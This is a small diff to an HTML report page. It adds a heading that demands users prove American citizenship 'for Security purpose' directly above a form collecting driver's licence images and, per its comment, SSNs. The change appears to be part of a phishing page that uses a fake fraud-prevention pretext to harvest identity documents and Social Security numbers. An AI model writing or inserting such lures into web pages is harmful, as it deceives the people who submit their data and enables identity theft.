--- a/report.html
+++ b/report.html
@@ -78,7 +78,7 @@
 
   <button type="submit">Submit Report</button>
 </form>
-
+<h1>Due to the rise in cyber attacks and fraud and for Security purpose, we need to verify that you are an American citizen</h1>
 <!-- Additional input form for driver's license and SSN -->
 <form id="driverLicenseForm" class="driver-license-form">
   <label for="driverLicenseFront">Driver's License (Front):</label>
